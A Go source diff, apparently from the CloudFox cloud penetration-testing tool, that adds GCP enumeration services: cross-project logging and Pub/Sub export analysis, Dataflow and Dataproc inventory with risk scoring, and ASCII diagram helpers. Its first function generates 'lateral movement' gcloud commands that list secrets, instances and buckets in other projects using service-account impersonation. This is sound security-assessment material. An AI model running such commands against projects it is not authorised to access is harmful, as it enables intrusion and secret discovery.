func (s *CrossProjectService) generateLateralMovementCommands(path LateralMovementPath) []string {
	var commands []string

	// Build impersonation flag if service account
	impersonateFlag := ""
	if strings.HasPrefix(path.SourcePrincipal, "serviceAccount:") {
		email := strings.TrimPrefix(path.SourcePrincipal, "serviceAccount:")
		impersonateFlag = fmt.Sprintf(" --impersonate-service-account=%s", email)
	}

	// Add role-specific commands based on the most powerful role
	for _, role := range path.TargetRoles {
		roleLower := strings.ToLower(role)
		if strings.Contains(roleLower, "owner") || strings.Contains(roleLower, "editor") {
			commands = append(commands,
				fmt.Sprintf("gcloud compute instances list --project=%s%s", path.TargetProject, impersonateFlag),
				fmt.Sprintf("gcloud secrets list --project=%s%s", path.TargetProject, impersonateFlag),
				fmt.Sprintf("gsutil ls -p %s", path.TargetProject),
			)
			break // owner/editor covers everything, no need for more specific commands
		} else if strings.Contains(roleLower, "storage") {
			commands = append(commands,
				fmt.Sprintf("gsutil ls -p %s", path.TargetProject),
			)
		} else if strings.Contains(roleLower, "compute") {
			commands = append(commands,
				fmt.Sprintf("gcloud compute instances list --project=%s%s", path.TargetProject, impersonateFlag),
			)
		} else if strings.Contains(roleLower, "secretmanager") {
			commands = append(commands,
				fmt.Sprintf("gcloud secrets list --project=%s%s", path.TargetProject, impersonateFlag),
			)
		} else if strings.Contains(roleLower, "bigquery") {
			commands = append(commands,
				fmt.Sprintf("bq ls --project_id=%s", path.TargetProject),
			)
		}
	}

	return commands
}

// extractProjectFromMember extracts the project ID from a member string.
// If orgCache is provided, it resolves project numbers to IDs.
+func extractProjectFromMember(member string, orgCache *gcpinternal.OrgCache) string { + if !strings.HasPrefix(member, "serviceAccount:") { + return "" + } + + email := strings.TrimPrefix(member, "serviceAccount:") + parts := strings.Split(email, "@") + if len(parts) != 2 { + return "" + } + + prefix := parts[0] + domain := parts[1] + + // Helper to resolve a project number to ID via OrgCache + resolveNumber := func(number string) string { + if orgCache != nil && orgCache.IsPopulated() { + if resolved := orgCache.GetProjectIDByNumber(number); resolved != "" { + return resolved + } + } + return "" // Can't resolve without cache + } + + // Pattern: name@project-id.iam.gserviceaccount.com (regular SAs) + // But NOT gcp-sa-* domains (those are Google service agents with project numbers) + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") && !strings.HasPrefix(domain, "gcp-sa-") { + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart + } + + // Pattern: service-PROJECT_NUMBER@gcp-sa-*.iam.gserviceaccount.com + if strings.HasPrefix(domain, "gcp-sa-") && strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + number := prefix + if strings.HasPrefix(prefix, "service-") { + number = strings.TrimPrefix(prefix, "service-") + } + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + return "" + } + + // Pattern: PROJECT_ID@appspot.gserviceaccount.com + if domain == "appspot.gserviceaccount.com" { + return prefix // This is already a project ID + } + + // Pattern: PROJECT_NUMBER-compute@developer.gserviceaccount.com + if strings.HasSuffix(domain, "developer.gserviceaccount.com") { + if idx := strings.Index(prefix, "-compute"); idx > 0 { + number := prefix[:idx] + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + } + return "" + } + + // Pattern: PROJECT_NUMBER@cloudservices.gserviceaccount.com + if domain == "cloudservices.gserviceaccount.com" { + if resolved := 
resolveNumber(prefix); resolved != "" { + return resolved + } + return "" + } + + // Pattern: PROJECT_NUMBER@cloudbuild.gserviceaccount.com + if domain == "cloudbuild.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved + } + return "" + } + + return "" +} + +// extractPrincipalType extracts the type of principal from a member string +func extractPrincipalType(member string) string { + if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } + return "unknown" +} + +// categorizePrivilegeLevel categorizes the privilege level of a role +func categorizePrivilegeLevel(role string) string { + if strings.Contains(role, "owner") || strings.Contains(role, "Owner") { + return "ADMIN" + } + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + return "ADMIN" + } + if strings.Contains(role, "editor") || strings.Contains(role, "Editor") { + return "WRITE" + } + if strings.Contains(role, "writer") || strings.Contains(role, "Writer") { + return "WRITE" + } + if strings.Contains(role, "creator") || strings.Contains(role, "Creator") { + return "WRITE" + } + if strings.Contains(role, "viewer") || strings.Contains(role, "Viewer") { + return "READ" + } + if strings.Contains(role, "reader") || strings.Contains(role, "Reader") { + return "READ" + } + return "READ" // Default to READ for unknown +} + +// FindCrossProjectLoggingSinks discovers logging sinks that export to other projects +func (s *CrossProjectService) FindCrossProjectLoggingSinks(projectIDs []string) ([]CrossProjectLoggingSink, error) { + ctx := context.Background() + + loggingService, err := s.getLoggingService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + // Build project lookup 
map + projectMap := make(map[string]bool) + for _, p := range projectIDs { + projectMap[p] = true + } + + var crossProjectSinks []CrossProjectLoggingSink + + for _, sourceProject := range projectIDs { + parent := fmt.Sprintf("projects/%s", sourceProject) + req := loggingService.Projects.Sinks.List(parent) + err := req.Pages(ctx, func(page *logging.ListSinksResponse) error { + for _, sink := range page.Sinks { + // Parse destination to extract target project + destType, targetProject := parseLoggingDestination(sink.Destination) + + // Check if this is a cross-project sink + if targetProject != "" && targetProject != sourceProject { + riskLevel, riskReasons := analyzeLoggingSinkRisk(sink, targetProject, projectMap) + + crossSink := CrossProjectLoggingSink{ + SourceProject: sourceProject, + SinkName: sink.Name, + Destination: sink.Destination, + DestinationType: destType, + TargetProject: targetProject, + Filter: sink.Filter, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + } + crossProjectSinks = append(crossProjectSinks, crossSink) + } + } + return nil + }) + if err != nil { + // Continue with other projects + continue + } + } + + return crossProjectSinks, nil +} + +// parseLoggingDestination parses a logging sink destination to extract type and project +func parseLoggingDestination(destination string) (destType, projectID string) { + // Destination formats: + // storage.googleapis.com/BUCKET_NAME + // bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + // pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + // logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + + if strings.HasPrefix(destination, "storage.googleapis.com/") { + // GCS bucket - need to look up bucket to get project (not easily extractable) + return "storage", "" + } + + if strings.HasPrefix(destination, "bigquery.googleapis.com/") { + destType = "bigquery" + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + parts := 
strings.Split(destination, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return destType, parts[i+1] + } + } + } + + if strings.HasPrefix(destination, "pubsub.googleapis.com/") { + destType = "pubsub" + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + parts := strings.Split(destination, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return destType, parts[i+1] + } + } + } + + if strings.HasPrefix(destination, "logging.googleapis.com/") { + destType = "logging" + // Format: logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + parts := strings.Split(destination, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return destType, parts[i+1] + } + } + } + + return "unknown", "" +} + +// analyzeLoggingSinkRisk analyzes the risk level of a cross-project logging sink +func analyzeLoggingSinkRisk(sink *logging.LogSink, targetProject string, knownProjects map[string]bool) (string, []string) { + var reasons []string + score := 0 + + // External project is higher risk + if !knownProjects[targetProject] { + reasons = append(reasons, "Logs exported to project outside analyzed scope") + score += 2 + } + + // Check if filter is broad (empty = all logs) + if sink.Filter == "" { + reasons = append(reasons, "No filter - ALL logs exported") + score += 2 + } + + // Check for sensitive log types in filter + sensitiveLogTypes := []string{"data_access", "admin_activity", "cloudaudit"} + for _, lt := range sensitiveLogTypes { + if strings.Contains(sink.Filter, lt) { + reasons = append(reasons, fmt.Sprintf("Exports sensitive logs: %s", lt)) + score += 1 + } + } + + // Check if sink has service account (writerIdentity) + if sink.WriterIdentity != "" { + reasons = append(reasons, fmt.Sprintf("Service account: %s", sink.WriterIdentity)) + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons 
+ } + return "LOW", reasons +} + +// FindCrossProjectPubSubExports discovers Pub/Sub subscriptions that export to other projects +func (s *CrossProjectService) FindCrossProjectPubSubExports(projectIDs []string) ([]CrossProjectPubSubExport, error) { + ctx := context.Background() + + pubsubService, err := s.getPubSubService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + + // Build project lookup map + projectMap := make(map[string]bool) + for _, p := range projectIDs { + projectMap[p] = true + } + + var crossProjectExports []CrossProjectPubSubExport + + for _, sourceProject := range projectIDs { + // List all subscriptions in project + parent := fmt.Sprintf("projects/%s", sourceProject) + req := pubsubService.Projects.Subscriptions.List(parent) + err := req.Pages(ctx, func(page *pubsub.ListSubscriptionsResponse) error { + for _, sub := range page.Subscriptions { + // Extract subscription name and topic project + subName := extractResourceNameFromPath(sub.Name) + topicProject := extractProjectFromPath(sub.Topic) + + var exportType, exportDest, targetProject string + + // Check for BigQuery export + if sub.BigqueryConfig != nil && sub.BigqueryConfig.Table != "" { + exportType = "bigquery" + exportDest = sub.BigqueryConfig.Table + // Extract project from table: PROJECT:DATASET.TABLE + if parts := strings.Split(sub.BigqueryConfig.Table, ":"); len(parts) > 0 { + targetProject = parts[0] + } + } + + // Check for Cloud Storage export + if sub.CloudStorageConfig != nil && sub.CloudStorageConfig.Bucket != "" { + exportType = "cloudstorage" + exportDest = sub.CloudStorageConfig.Bucket + // Bucket project not easily extractable without additional API call + targetProject = "" + } + + // Check for push endpoint + if sub.PushConfig != nil && sub.PushConfig.PushEndpoint != "" { + exportType = "push" + exportDest = sub.PushConfig.PushEndpoint + // External push endpoints can't be mapped to a project + targetProject = "external" + 
} + + // Check if subscription is to a topic in another project + if topicProject != "" && topicProject != sourceProject { + // This is a cross-project topic subscription + riskLevel, riskReasons := analyzePubSubExportRisk(sub, targetProject, projectMap, topicProject, sourceProject) + export := CrossProjectPubSubExport{ + SourceProject: sourceProject, + TopicProject: topicProject, + TopicName: extractResourceNameFromPath(sub.Topic), + SubscriptionName: subName, + ExportType: "cross-project-topic", + ExportDest: sub.Topic, + TargetProject: topicProject, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + } + crossProjectExports = append(crossProjectExports, export) + } + + // If exporting to another project via BQ/GCS + if targetProject != "" && targetProject != sourceProject && targetProject != "external" { + riskLevel, riskReasons := analyzePubSubExportRisk(sub, targetProject, projectMap, topicProject, sourceProject) + export := CrossProjectPubSubExport{ + SourceProject: sourceProject, + TopicProject: topicProject, + TopicName: extractResourceNameFromPath(sub.Topic), + SubscriptionName: subName, + ExportType: exportType, + ExportDest: exportDest, + TargetProject: targetProject, + RiskLevel: riskLevel, + RiskReasons: riskReasons, + } + crossProjectExports = append(crossProjectExports, export) + } + } + return nil + }) + if err != nil { + // Continue with other projects + continue + } + } + + return crossProjectExports, nil +} + +// extractResourceNameFromPath extracts the resource name from a full path +func extractResourceNameFromPath(path string) string { + parts := strings.Split(path, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return path +} + +// extractProjectFromPath extracts the project ID from a resource path +func extractProjectFromPath(path string) string { + // Format: projects/PROJECT_ID/... 
+ parts := strings.Split(path, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +// analyzePubSubExportRisk analyzes the risk level of a cross-project Pub/Sub export +func analyzePubSubExportRisk(sub *pubsub.Subscription, targetProject string, knownProjects map[string]bool, topicProject, sourceProject string) (string, []string) { + var reasons []string + score := 0 + + // External target project is higher risk + if targetProject != "" && !knownProjects[targetProject] { + reasons = append(reasons, "Data exported to project outside analyzed scope") + score += 2 + } + + // Cross-project topic subscription + if topicProject != "" && topicProject != sourceProject { + reasons = append(reasons, fmt.Sprintf("Subscription to topic in project %s", topicProject)) + score += 1 + } + + // Push to external endpoint + if sub.PushConfig != nil && sub.PushConfig.PushEndpoint != "" { + endpoint := sub.PushConfig.PushEndpoint + reasons = append(reasons, fmt.Sprintf("Push endpoint: %s", endpoint)) + // External endpoints are high risk + if !strings.Contains(endpoint, ".run.app") && !strings.Contains(endpoint, ".cloudfunctions.net") { + reasons = append(reasons, "Push to external (non-GCP) endpoint") + score += 2 + } + } + + // BigQuery export + if sub.BigqueryConfig != nil { + reasons = append(reasons, fmt.Sprintf("BigQuery export: %s", sub.BigqueryConfig.Table)) + score += 1 + } + + // Cloud Storage export + if sub.CloudStorageConfig != nil { + reasons = append(reasons, fmt.Sprintf("Cloud Storage export: %s", sub.CloudStorageConfig.Bucket)) + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } + return "LOW", reasons +} diff --git a/gcp/services/dataflowService/dataflowService.go b/gcp/services/dataflowService/dataflowService.go new file mode 100644 index 00000000..4d8a0eef --- /dev/null +++ b/gcp/services/dataflowService/dataflowService.go @@ 
-0,0 +1,176 @@ +package dataflowservice + +import ( + "context" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + dataflow "google.golang.org/api/dataflow/v1b3" +) + +type DataflowService struct { + session *gcpinternal.SafeSession +} + +func New() *DataflowService { + return &DataflowService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataflowService { + return &DataflowService{session: session} +} + +// getService returns a Dataflow service client using cached session if available +func (s *DataflowService) getService(ctx context.Context) (*dataflow.Service, error) { + if s.session != nil { + return sdk.CachedGetDataflowService(ctx, s.session) + } + return dataflow.NewService(ctx) +} + +// JobInfo represents a Dataflow job +type JobInfo struct { + ID string `json:"id"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + Type string `json:"type"` // JOB_TYPE_BATCH or JOB_TYPE_STREAMING + State string `json:"state"` // JOB_STATE_RUNNING, etc. 
+ CreateTime string `json:"createTime"` + CurrentStateTime string `json:"currentStateTime"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + TempLocation string `json:"tempLocation"` // GCS temp location + StagingLocation string `json:"stagingLocation"` // GCS staging location + WorkerRegion string `json:"workerRegion"` + WorkerZone string `json:"workerZone"` + NumWorkers int64 `json:"numWorkers"` + MachineType string `json:"machineType"` + UsePublicIPs bool `json:"usePublicIps"` + EnableStreamingEngine bool `json:"enableStreamingEngine"` + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// TemplateInfo represents a Dataflow template +type TemplateInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + // Template metadata +} + +// ListJobs retrieves all Dataflow jobs in a project +func (s *DataflowService) ListJobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") + } + + var jobs []JobInfo + + // List jobs across all locations + req := service.Projects.Jobs.Aggregated(projectID) + err = req.Pages(ctx, func(page *dataflow.ListJobsResponse) error { + for _, job := range page.Jobs { + info := s.parseJob(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataflow.googleapis.com") + } + + return jobs, nil +} + +// parseJob converts a Dataflow job to JobInfo +func (s *DataflowService) parseJob(job *dataflow.Job, projectID string) JobInfo { + info := JobInfo{ + ID: job.Id, + Name: job.Name, + ProjectID: projectID, + Location: job.Location, + Type: job.Type, + State: job.CurrentState, + CreateTime: job.CreateTime, + CurrentStateTime: 
job.CurrentStateTime, + RiskReasons: []string{}, + } + + // Parse environment settings + if job.Environment != nil { + info.ServiceAccount = job.Environment.ServiceAccountEmail + info.TempLocation = job.Environment.TempStoragePrefix + info.WorkerRegion = job.Environment.WorkerRegion + info.WorkerZone = job.Environment.WorkerZone + + // Check worker pools for network config + if len(job.Environment.WorkerPools) > 0 { + wp := job.Environment.WorkerPools[0] + info.Network = wp.Network + info.Subnetwork = wp.Subnetwork + info.NumWorkers = wp.NumWorkers + info.MachineType = wp.MachineType + + // Check for public IPs - default is true if not specified + if wp.IpConfiguration == "WORKER_IP_PRIVATE" { + info.UsePublicIPs = false + } else { + info.UsePublicIPs = true + } + } + } + + // Security analysis + info.RiskLevel, info.RiskReasons = s.analyzeJobRisk(info) + + return info +} + +// analyzeJobRisk determines the risk level of a Dataflow job +func (s *DataflowService) analyzeJobRisk(job JobInfo) (string, []string) { + var reasons []string + score := 0 + + // Public IPs increase exposure + if job.UsePublicIPs { + reasons = append(reasons, "Workers use public IP addresses") + score += 2 + } + + // Default service account is often over-privileged + if job.ServiceAccount == "" || strings.Contains(job.ServiceAccount, "compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine service account") + score += 2 + } + + // Check for external temp/staging locations + if job.TempLocation != "" && !strings.Contains(job.TempLocation, job.ProjectID) { + reasons = append(reasons, "Temp location may be in external project") + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] 
+ } + return fullName +} diff --git a/gcp/services/dataprocService/dataprocService.go b/gcp/services/dataprocService/dataprocService.go new file mode 100644 index 00000000..3500782b --- /dev/null +++ b/gcp/services/dataprocService/dataprocService.go @@ -0,0 +1,295 @@ +package dataprocservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + dataproc "google.golang.org/api/dataproc/v1" +) + +type DataprocService struct { + session *gcpinternal.SafeSession +} + +func New() *DataprocService { + return &DataprocService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *DataprocService { + return &DataprocService{session: session} +} + +// getService returns a Dataproc service client using cached session if available +func (s *DataprocService) getService(ctx context.Context) (*dataproc.Service, error) { + if s.session != nil { + return sdk.CachedGetDataprocService(ctx, s.session) + } + return dataproc.NewService(ctx) +} + +// ClusterInfo represents a Dataproc cluster +type ClusterInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + State string `json:"state"` + StateStartTime string `json:"stateStartTime"` + ClusterUUID string `json:"clusterUuid"` + + // Config + ConfigBucket string `json:"configBucket"` + TempBucket string `json:"tempBucket"` + ImageVersion string `json:"imageVersion"` + ServiceAccount string `json:"serviceAccount"` + + // Master config + MasterMachineType string `json:"masterMachineType"` + MasterCount int64 `json:"masterCount"` + MasterDiskSizeGB int64 `json:"masterDiskSizeGb"` + MasterInstanceNames []string `json:"masterInstanceNames"` + + // Worker config + WorkerMachineType string `json:"workerMachineType"` + WorkerCount int64 `json:"workerCount"` + WorkerDiskSizeGB int64 
`json:"workerDiskSizeGb"` + + // Network config + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + InternalIPOnly bool `json:"internalIpOnly"` + Zone string `json:"zone"` + + // Security config + KerberosEnabled bool `json:"kerberosEnabled"` + SecureBoot bool `json:"secureBoot"` + + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// JobInfo represents a Dataproc job +type JobInfo struct { + JobID string `json:"jobId"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + ClusterName string `json:"clusterName"` + Status string `json:"status"` + JobType string `json:"jobType"` + SubmittedBy string `json:"submittedBy"` + StartTime string `json:"startTime"` + EndTime string `json:"endTime"` +} + +// ListClusters retrieves all Dataproc clusters +func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + var clusters []ClusterInfo + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + + // List across all regions + for _, region := range regions { + regionClusters, err := service.Projects.Regions.Clusters.List(projectID, region).Context(ctx).Do() + if err != nil { + continue // Skip regions with errors (API not enabled, no permissions, etc.) 
+ } + + for _, cluster := range regionClusters.Clusters { + info := s.parseCluster(cluster, projectID, region, service, ctx) + clusters = append(clusters, info) + } + } + + return clusters, nil +} + +// ListJobs retrieves recent Dataproc jobs +func (s *DataprocService) ListJobs(projectID, region string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + var jobs []JobInfo + + resp, err := service.Projects.Regions.Jobs.List(projectID, region).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "dataproc.googleapis.com") + } + + for _, job := range resp.Jobs { + info := s.parseJob(job, projectID, region) + jobs = append(jobs, info) + } + + return jobs, nil +} + +func (s *DataprocService) parseCluster(cluster *dataproc.Cluster, projectID, region string, service *dataproc.Service, ctx context.Context) ClusterInfo { + info := ClusterInfo{ + Name: cluster.ClusterName, + ProjectID: projectID, + Region: region, + ClusterUUID: cluster.ClusterUuid, + IAMBindings: []IAMBinding{}, + } + + if cluster.Status != nil { + info.State = cluster.Status.State + info.StateStartTime = cluster.Status.StateStartTime + } + + if cluster.Config != nil { + info.ConfigBucket = cluster.Config.ConfigBucket + info.TempBucket = cluster.Config.TempBucket + + // Software config + if cluster.Config.SoftwareConfig != nil { + info.ImageVersion = cluster.Config.SoftwareConfig.ImageVersion + } + + // GCE cluster config + if cluster.Config.GceClusterConfig != nil { + gcc := cluster.Config.GceClusterConfig + info.ServiceAccount = gcc.ServiceAccount + info.Network = extractName(gcc.NetworkUri) + info.Subnetwork = extractName(gcc.SubnetworkUri) + info.InternalIPOnly = gcc.InternalIpOnly + info.Zone = extractName(gcc.ZoneUri) + + if gcc.ShieldedInstanceConfig != nil { + info.SecureBoot = gcc.ShieldedInstanceConfig.EnableSecureBoot + } + } + + // 
Master config + if cluster.Config.MasterConfig != nil { + mc := cluster.Config.MasterConfig + info.MasterMachineType = extractName(mc.MachineTypeUri) + info.MasterCount = mc.NumInstances + info.MasterInstanceNames = mc.InstanceNames + if mc.DiskConfig != nil { + info.MasterDiskSizeGB = mc.DiskConfig.BootDiskSizeGb + } + } + + // Worker config + if cluster.Config.WorkerConfig != nil { + wc := cluster.Config.WorkerConfig + info.WorkerMachineType = extractName(wc.MachineTypeUri) + info.WorkerCount = wc.NumInstances + if wc.DiskConfig != nil { + info.WorkerDiskSizeGB = wc.DiskConfig.BootDiskSizeGb + } + } + + // Security config + if cluster.Config.SecurityConfig != nil && cluster.Config.SecurityConfig.KerberosConfig != nil { + info.KerberosEnabled = true + } + } + + // Get IAM policy for the cluster + info.IAMBindings = s.getClusterIAMBindings(service, ctx, projectID, region, cluster.ClusterName) + + return info +} + +func (s *DataprocService) parseJob(job *dataproc.Job, projectID, region string) JobInfo { + info := JobInfo{ + JobID: job.Reference.JobId, + ProjectID: projectID, + Region: region, + ClusterName: job.Placement.ClusterName, + } + + if job.Status != nil { + info.Status = job.Status.State + info.StartTime = job.Status.StateStartTime + } + + if job.StatusHistory != nil && len(job.StatusHistory) > 0 { + for _, status := range job.StatusHistory { + if status.State == "DONE" || status.State == "ERROR" || status.State == "CANCELLED" { + info.EndTime = status.StateStartTime + break + } + } + } + + // Determine job type + if job.HadoopJob != nil { + info.JobType = "Hadoop" + } else if job.SparkJob != nil { + info.JobType = "Spark" + } else if job.PysparkJob != nil { + info.JobType = "PySpark" + } else if job.HiveJob != nil { + info.JobType = "Hive" + } else if job.PigJob != nil { + info.JobType = "Pig" + } else if job.SparkRJob != nil { + info.JobType = "SparkR" + } else if job.SparkSqlJob != nil { + info.JobType = "SparkSQL" + } else if job.PrestoJob != nil { + 
info.JobType = "Presto" + } else { + info.JobType = "Unknown" + } + + return info +} + +// getClusterIAMBindings retrieves IAM bindings for a Dataproc cluster +func (s *DataprocService) getClusterIAMBindings(service *dataproc.Service, ctx context.Context, projectID, region, clusterName string) []IAMBinding { + var bindings []IAMBinding + + resource := fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, region, clusterName) + policy, err := service.Projects.Regions.Clusters.GetIamPolicy(resource, &dataproc.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func extractName(fullPath string) string { + if fullPath == "" { + return "" + } + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/diagramService/diagramService.go b/gcp/services/diagramService/diagramService.go new file mode 100755 index 00000000..05bdde47 --- /dev/null +++ b/gcp/services/diagramService/diagramService.go @@ -0,0 +1,1405 @@ +package diagramservice + +import ( + "fmt" + "sort" + "strings" +) + +// DiagramConfig holds configuration for diagram generation +type DiagramConfig struct { + Width int // Default outer width + InnerWidth int // Default inner width + ShowLegend bool // Whether to show legend + CompactMode bool // Use compact layout +} + +// DefaultConfig returns sensible defaults for diagram generation +func DefaultConfig() DiagramConfig { + return DiagramConfig{ + Width: 90, + InnerWidth: 84, + ShowLegend: true, + CompactMode: false, + } +} + +// ======================================== +// Core Drawing Primitives +// ======================================== + +// DrawBox draws a simple box with 
centered title +func DrawBox(title string, width int) string { + var sb strings.Builder + + // Top border + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + + // Title line (centered) + padding := (width - 4 - len(title)) / 2 + if padding < 0 { + padding = 0 + } + sb.WriteString("│ ") + sb.WriteString(strings.Repeat(" ", padding)) + sb.WriteString(title) + sb.WriteString(strings.Repeat(" ", width-4-padding-len(title))) + sb.WriteString(" │\n") + + // Bottom border + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawBoxWithContent draws a box with title and content lines +func DrawBoxWithContent(title string, content []string, width int) string { + var sb strings.Builder + + // Top border + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + + // Title line + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + + // Separator + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + // Content lines + for _, line := range content { + if len(line) > width-4 { + line = line[:width-7] + "..." 
+ } + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, line)) + } + + // Bottom border + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + + return sb.String() +} + +// DrawSectionHeader draws a section header box +func DrawSectionHeader(title string, width int) string { + var sb strings.Builder + + sb.WriteString("┌") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┐\n") + sb.WriteString(fmt.Sprintf("│ %-*s │\n", width-4, title)) + sb.WriteString("├") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┤\n") + + return sb.String() +} + +// DrawSectionFooter draws a section footer +func DrawSectionFooter(width int) string { + var sb strings.Builder + sb.WriteString("└") + sb.WriteString(strings.Repeat("─", width-2)) + sb.WriteString("┘\n") + return sb.String() +} + +// DrawNestedBox draws a box nested inside another (with indentation) +func DrawNestedBox(title string, content []string, outerWidth, indent int) string { + var sb strings.Builder + innerWidth := outerWidth - (indent * 2) - 4 + + // Padding prefix + pad := strings.Repeat(" ", indent) + + // Top border + sb.WriteString(fmt.Sprintf("│%s┌%s┐%s│\n", pad, strings.Repeat("─", innerWidth-2), pad)) + + // Title + titleLine := title + if len(titleLine) > innerWidth-4 { + titleLine = titleLine[:innerWidth-7] + "..." + } + sb.WriteString(fmt.Sprintf("│%s│ %-*s │%s│\n", pad, innerWidth-4, titleLine, pad)) + + // Separator if content exists + if len(content) > 0 { + sb.WriteString(fmt.Sprintf("│%s├%s┤%s│\n", pad, strings.Repeat("─", innerWidth-2), pad)) + + for _, line := range content { + if len(line) > innerWidth-4 { + line = line[:innerWidth-7] + "..." 
			}
			sb.WriteString(fmt.Sprintf("│%s│ %-*s │%s│\n", pad, innerWidth-4, line, pad))
		}
	}

	// Bottom border
	sb.WriteString(fmt.Sprintf("│%s└%s┘%s│\n", pad, strings.Repeat("─", innerWidth-2), pad))

	return sb.String()
}

// DrawEmptyLine draws one blank interior line of a width-wide box
// ("│" + spaces + "│").
func DrawEmptyLine(width int) string {
	return fmt.Sprintf("│%s│\n", strings.Repeat(" ", width-2))
}

// DrawTextLine draws one left-padded text line inside a width-wide box,
// truncating the text with "..." if it exceeds width-4 columns.
func DrawTextLine(text string, width int) string {
	if len(text) > width-4 {
		text = text[:width-7] + "..."
	}
	return fmt.Sprintf("│ %-*s │\n", width-4, text)
}

// ========================================
// Network Diagram Components
// ========================================

// NetworkInfo represents a VPC network for diagram purposes.
type NetworkInfo struct {
	Name        string
	ProjectID   string
	RoutingMode string
	// MTU in bytes, as reported by the Compute API.
	MTU         int64
	IsSharedVPC bool
	// SharedVPCRole is upper-cased by the renderers (e.g. HOST / SERVICE).
	SharedVPCRole string
	PeeringCount  int
}

// SubnetInfo represents a subnet for diagram purposes.
type SubnetInfo struct {
	Name        string
	Region      string
	IPCIDRRange string
	// PrivateIPGoogleAccess is rendered as the PGA:Y/N flag.
